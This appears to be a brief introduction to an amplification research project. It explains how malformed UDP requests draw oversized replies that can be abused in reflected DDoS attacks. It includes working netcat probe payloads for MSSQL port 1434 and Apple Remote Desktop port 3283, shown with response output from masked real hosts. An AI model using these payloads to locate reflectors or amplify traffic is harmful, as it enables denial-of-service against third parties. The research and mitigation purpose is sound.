Amplification Research

AMP-Research is a research on exotic UDP/TCP amplification vectors, payloads and mitigations.

Amplification is where a simple malformed socket or packets request elicit a response larger than the input data. This can be abused to "amplify" a request, by means of Distributed Reflected Denial of Service (DRDoS) attacks or DDoS. 

Best way to show what this means is using the network protocol MSSQL over TCP/IP UDP port 1434 (23 times amplification factor) as an example.

$ echo -ne '\x02' | nc -u -q 2 190.xx.xx.xx 1434|xxd -p|wc -c
629 bytes

Another example on ARD (Apple Remote Desktop) listener:

$ echo -ne '\x00\x14\x00\x01\x03' |nc -u 89.xx.xx.xx 3283|hexdump
0000000 0100 ea03 3100 0000 0000 0000 0000 0000
0000010 0000 0000 0000 0000 0000 0000 0000 0000
0000020 0000 0000 0000 0000 0100 0000 0000 0000
0000030 0000 0000 0000 0000 0000 0000 0000 0000
_
0000050 0000 1200 0000 0000 0000 0000 0000 0000
0000060 0000 0000 0000 0000 0000 0000 0000 0000
0000070 0000 0000 0000 0000 0000 0000 0000 640a
0000080 7461 6861 6565 6472 0034 0000 0000 0000
0000090 0000 0000 0000 0000 0000 0000 0000 0000
_
00000c0 0000 0001 0000 0000 0000 0000 0000 0000
00000d0 0000 0000 0000 9803 0000 0100 18f0 ed98
00000e0 9288 0000 0000 0a00 6400 6100 7400 6100
00000f0 6800 6500 6500 7200 6400 3400 0000 0000
0000100 0000 0000 0000 0000 0000 0000 0000 0000

Links:

• AMP-Research